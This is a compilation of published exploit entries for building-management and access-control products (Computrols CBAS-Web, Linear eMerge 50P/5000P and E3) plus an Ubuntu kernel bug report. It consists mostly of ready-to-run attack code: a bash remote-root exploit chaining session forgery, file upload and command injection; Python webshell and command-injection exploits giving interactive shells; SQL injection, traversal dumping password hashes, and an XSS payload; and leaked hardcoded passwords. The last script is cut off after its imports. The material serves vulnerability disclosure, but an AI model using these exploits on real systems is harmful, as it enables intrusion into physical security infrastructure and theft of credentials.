Computrols CBAS-Web Information Disclosure

Affected versions: 19.0.0 and below
CVE: CVE-2019-10849
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic


$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
#    mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"

Ubuntu: ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs error path

Tested on 19.10.

Ubuntu's aufs kernel patch includes the following change (which I interestingly
can't see in the AUFS code at
https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):

==================================================================
+#define vma_fput(vma)                  vma_do_fput(vma, __func__, __LINE__)
[...]
@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
        return addr;

 unmap_and_free_vma:
+       vma_fput(vma);
        vma->vm_file = NULL;
-       fput(file);

        /* Undo any partial mapping done by a device driver. */
        unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
[...]
+void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
+{
+       struct file *f = vma->vm_file, *pr = vma->vm_prfile;
+
+       prfile_trace(f, pr, func, line, __func__);
+       fput(f);
+       if (f && pr)
+               fput(pr);
+}
==================================================================

This means that in the case where call_mmap() returns an error to mmap_region(),
fput() will be called on the current value of vma->vm_file instead of the saved
file pointer. This matters if the ->mmap() handler replaces ->vm_file before
returning an error code.

overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
see ovl_mmap() and shiftfs_mmap().

To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes fuse_file_mmap()
to bail out with -ENODEV if MAP_SHARED is set.

I would have used overlayfs instead, but there is an unrelated bug that makes it
impossible to mount overlayfs inside a user namespace:
Commit 82c0860106f264 (\"UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
and upper mounts\") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
already has the same value. This causes mount_too_revealing() to bail out with a
WARN_ONCE().

Note that this PoC requires the \"bindfs\" package and should be executed with
\"slub_debug\" in the kernel commandline to get a clear crash.

==================================================================
Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0

user-Standard-PC-Q35-ICH9-2009 login: user
Password: 
Last login: Fr Nov  1 23:45:36 CET 2019 on ttyS0
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


0 updates can be installed immediately.
0 of these updates are security updates.

user@user-Standard-PC-Q35-ICH9-2009:~$ ls
aufs-mmap  Documents  Music     Public     trace.dat
Desktop    Downloads  Pictures  Templates  Videos
user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline 
BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
#!/bin/bash
set -e

mount -t tmpfs none /tmp
mkdir -p /tmp/{lower,middle,upper}
touch /tmp/lower/foo
# mount some random FUSE filesystem with direct_io,
# doesn't really matter what it does as long as
# there's a file in it.
# (this is just to get some filesystem that can
# easily be convinced to throw errors from f_op->mmap)
bindfs -o direct_io /tmp/lower /tmp/middle
# use the FUSE filesystem to back shiftfs.
# overlayfs would also work if SB_I_NOSUID and
# SB_I_USERNS_VISIBLE weren't defined to the same
# value...
mount -t shiftfs -o mark /tmp/middle /tmp/upper
mount|grep shift
gcc -o trigger trigger.c -Wall
./trigger
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

int main(void) {
  int foofd = open(\"/tmp/upper/foo\", O_RDONLY);
  if (foofd == -1) err(1, \"open foofd\");
  void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  if (badmap == MAP_FAILED) {
    perror(\"badmap\");
  } else {
    errx(1, \"badmap worked???\");
  }
  sleep(1);
  mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
}
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh 
/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
badmap: No such device
[   72.101721] general protection fault: 0000 [#1] SMP PTI
[   72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic #20-Ubuntu
[   72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[   72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[   72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[   72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[   72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[   72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[   72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[   72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[   72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[   72.189705] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[   72.193073] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[   72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   72.202815] Call Trace:
[   72.203712]  mmap_region+0x417/0x670
[   72.204868]  do_mmap+0x3a8/0x580
[   72.205939]  vm_mmap_pgoff+0xcb/0x120
[   72.207954]  ksys_mmap_pgoff+0x1ca/0x2a0
[   72.210078]  __x64_sys_mmap+0x33/0x40
[   72.211327]  do_syscall_64+0x5a/0x130
[   72.212538]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.214177] RIP: 0033:0x7faa3ecc7af6
[   72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[   72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[   72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007faa3ecc7af6
[   72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[   72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000
[   72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 0000556248213100
[   72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 0000000000000000
[   72.237681] Modules linked in: shiftfs intel_rapl_msr snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci virtio_blk
[   72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
[   72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[   72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[   72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[   72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
[   72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
[   72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
[   72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
[   72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
[   72.284048] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
[   72.287161] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
[   72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
==================================================================

Faulting code:

0000000F  55                push rbp
00000010  4889E5            mov rbp,rsp
00000013  4157              push r15
00000015  4156              push r14
00000017  4155              push r13
00000019  4154              push r12
0000001B  488B87C8000000    mov rax,[rdi+0xc8]
00000022  4C8B6810          mov r13,[rax+0x10]
00000026  498B4528          mov rax,[r13+0x28]
0000002A  4883786000        cmp qword [rax+0x60],byte +0x0     <<<< GPF HERE
0000002F  0F8497000000      jz near 0xcc
00000035  4989FC            mov r12,rdi
00000038  4989F6            mov r14,rsi

As you can see, the poison value 6b6b6b6b6b6b6b6b is being dereferenced.


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-15794.



Found by: jannh@google.com

#!/bin/bash
#
# Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07
# Including escalating to root privileges
# CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269
# Advisory: https://applied-risk.com/resources/ar-2019-006
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# 
# This script is tested on macOS 10.13.6
# by Sipke Mellema
#
# usage: ./sploit.sh http://target
#
##########################################################################
#
# $ ./sploit.sh http://192.168.1.1
#
#
#     .         .         .         .         .
#   .          .         .          .          . 
#  |          |Linear eMerge50 4.6.07|          |
#  |          |                      |          |
#  |          |Remote code executionz|          |
#  |          | With priv escalation |          |
#  |          |    Get yours today   |          |
#  |          |          |           |          |
#  |          |        Boomch        |          |
#   .          .         .          .          . 
#        .        .        .        .        . 
#
#
#
# [*] Checking connection to the target..
# [V] We can connect to the server
# [*] Checking if already infected..
# [V] Target not yet infected..
# [*] Creating custom session file..
# [*] Uploading custom session file..
# [V] Session file active!
# [*] Retrieving CSRF token..
# [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9
# [*] Uploading file..
# [V] File successfully uploaded
# [*] Writing new config..
# [V] Wrote new config, restarting device
# [*] Looks good! Waiting for device to reboot..
# [V] Executing: whoami..
# [V] Username found: root
# [*] Cleaning up uploaded files..
# [*] Removing fake backup file..
# [*] Removing shell script..
# [*] Files removed
#
# [*] If that worked, you can how execute commands via your cookie
# [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi
# [*] Or type commands below ('quit' to quit)
#
# root@http://192.168.1.1$ id
# uid=0(root) gid=0(root) groups=0(root)
# root@http://192.168.1.1$ quit
#
##########################################################################

RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m'
BANNER="
\t   .         .         .         .         .
\t .          .         .          .          . 
\t|          |${BLUE}Linear eMerge50 4.6.07${RED}|          |
\t|          |${BLUE}                      ${RED}|          |
\t|          |${BLUE}Remote code executionz${RED}|          |
\t|          |${BLUE} With priv escalation ${RED}|          |
\t|          |${BLUE}    Get yours today   ${RED}|          |
\t|          |${BLUE}          |           ${RED}|          |
\t|          |${BLUE}        Boomch        ${RED}|          |
\t .          .         .          .          . 
\t      .        .        .        .        . 
${NC}
"
printf "\n${RED}${BANNER}\n\n"

function echo_green {
  printf "${GREEN}[*] $@${NC}\n"
}
function echo_blue  { 
  printf "${BLUE}[V] $@${NC}\n"
}
function echo_red   { 
  printf "${RED}[-] $@${NC}\n"
}

function show_usage {
  echo -en "Usage: ./sploit.sh
"
}


# check arguments
if [ $# -eq 0 ]
  then
    echo_red "Incorrect parameters"
    show_usage
    exit
fi


# Define global paramters
VULN_HOST=$1
TEST_CMD="whoami"

# ========================= Vuln 2: Session ID allows path traversal
# Path traversal to session file injected as backup file
SESSION_ID="../web/upload/system/backup.upg"


function run_remote_shell {
  # shell is in the context of the lower privileged user called s2user
  # but the user has sudo rights
  # ========================= Vuln 5: Webserver runs as root
  TEST_CMD=''
  while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do
    curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi
    echo ""
  done
}

# ========================= Pre-exploit checks

# check connection
echo_green "Checking connection to the target.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ; 
then
   echo_red "Could not connect to ${VULN_HOST} :(" ;
   exit
fi
echo_blue "We can connect to the server"

# check already infected
echo_green "Checking if already infected.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" == "200" ] ; then
   echo_blue "Target already seems to be infected"
   SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
   echo_blue "Username found: ${SPLOT_USERNAME}"
   read -p "Try shell directly? (Y/N)" TEST
   if [ "$TEST" == "Y" ] ; then
      echo_green "Trying direct shell.."
      run_remote_shell
      exit
    fi
else
   echo_blue "Target not yet infected.." ;
fi



# ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload
# Used to create file with the contents of a valid session file
# Session file required a timestamp from < 3600 seconds ago
# And a valid (remote) IP address

echo_green "Creating custom session file.."
# binary session file
SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s="
# write session/backup file
printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg
# write IP
MY_IP=`curl -s https://api.ipify.org`
printf ${MY_IP} >> backup.upg
printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg
# replace timestamp
python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null
# upload session as backup file
echo_green "Uploading custom session file.."
curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi

# check if session file works
RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ; then
   echo_red "Creating session file didn't seem to work :(" ;
   exit
fi
echo_blue "Session file active!"



# ========================= Vuln 3: Image upload allows any file contents
# We use it to upload a shell script
# It will be run as root on startup

# get csrf token
echo_green "Retrieving CSRF token.."
CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft           = "(.*)"' | awk -F '"''{print $2}'`
echo_blue "CSRF_TOKEN: $CSRF_TOKEN"

if [ -z "$CSRF_TOKEN" ]; then
  echo_red "Could not get CSRF token :("
  exit
fi

# prepare file
# this will run as root
echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi"> shell.jpg
echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi'>> shell.jpg

# upload file
echo_green "Uploading file.."
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \
  -F "csrft=$CSRF_TOKEN" \
  -F "person=31337" \
  -F "file=@shell.jpg" \
  ${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"`
echo_blue $RESULT

if [[ ! "$RESULT" =~ "successfully" ]]; then
  echo_red "Could not upload file :("
  exit
fi



# ========================= Vuln 4: Config allows command injection
# Length is limited
# Also, no spaces allowed

# change config
# the file in the config file will be run as root at startup
echo_green "Writing new config.."
curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp"> /dev/null
echo_blue "Wrote new config, restarting device"

# restart device
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"`
# this is supposed to get returned (device rebooting)
if [[ "$RESULT" =~ "could not handle the request" ]]; then
  echo_green "Looks good! Waiting for device to reboot.."
  sleep 20
  echo_blue "Executing: whoami.."
  SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
  echo_blue "Username found: ${SPLOT_USERNAME}"

  # cleanup
  echo_green "Cleaning up uploaded files.."
  echo_green "Removing fake backup file.."
  RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
  echo_green "Removing shell script.."
  RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
  echo_green "Files removed"

  # start shell
  echo ""
  echo_green "If that worked, you can now execute commands via your cookie"
  echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi"
  echo_green "Or type commands below ('quit' to quit)"
  echo ""

  run_remote_shell

else
    echo_red "Exploit failed :("
fi

exit

Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection

Affected versions: 19.0.0 and below
CVE: CVE-2019-10852
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system

by Gjoko 'LiquidWorm' Krstic

PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

Linear eMerge E3 Unauthenticated Directory Traversal File Disclosure
Affected version: <=1.00-06
CVE: CVE-2019-7254
Advisory: https://applied-risk.com/resources/ar-2019-005

by Gjoko 'LiquidWorm' Krstic


GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2

root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh


curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

Linear eMerge E3 Unauthenticated Reflected XSS
Affected version: <=1.00-06
CVE: CVE-2019-7255
Advisory: https://applied-risk.com/resources/ar-2019-005

Discovered by Gjoko 'LiquidWorm' Krstic

PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

#!/usr/bin/env python
#
# Linear eMerge E3 Arbitrary File Upload Remote Root Code Execution
# Affected version: <=1.00-06
# CVE: CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# Discovered by Gjoko 'LiquidWorm' Krstic
#
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################

import datetime
import requests
import sys#####
import os######

piton = os.path.basename(sys.argv[0])

badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"

if len(sys.argv) < 2:
  print "\n\x20\x20[*] Usage: "+piton+"<ipaddress:port>\n"
  sys.exit()

ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()

print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print

while True:
    try:
        target = "http://"+ipaddr+badge

        headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}

        payload = ("------j\r\nContent-Disposition: form-da"
"ta; name=\"layout_name\"\r\n\r\nwebshel"
"l.php\r\n------j\r\nContent-Disposition"
": form-data; name=\"bg\"; filename=\"we"
"bshell.php\"\r\nContent-Type: applicati"
"on/octet-stream\r\n\r\n<?\nif($_GET['cm"
"d']) {\n  system($_GET['cmd']);\n  }\n?"
">\n\r\n------j--\r\n")

        requests.post(target, headers=headers, data=payload)

        cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
        execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
        print execute.text
        if cmd.strip() == "exit":
            print "[+] Deleting webshell.php file..."
            requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
            print "[+] Done!\n"
            break
        else: continue
    except Exception:
        print "Error!"
        break

sys.exit()

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
#
# By Gjoko 'LiquidWorm' Krstic
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
  print '\n\x20\x20[*] Usage: '+piton+'<ipaddress:port>\n'
  sys.exit()

ipaddr = sys.argv[1]

print
while True:
  try:
    cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
    execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+'> test.txt%60')
    readreq = requests.get('http://'+ipaddr+'/test.txt')
    print readreq.text
    if cmd.strip() == 'exit':
      print "[+] Erasing read stage file and exiting..."
      requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
      print "[+] Done. Ba-bye!\n"
      break
    else: continue
  except Exception:
    break

sys.exit()

#!/usr/bin/env python
#
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
# Affected version: <=1.00-06
# via card_scan_decoder.php
# CVE: CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
#########################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
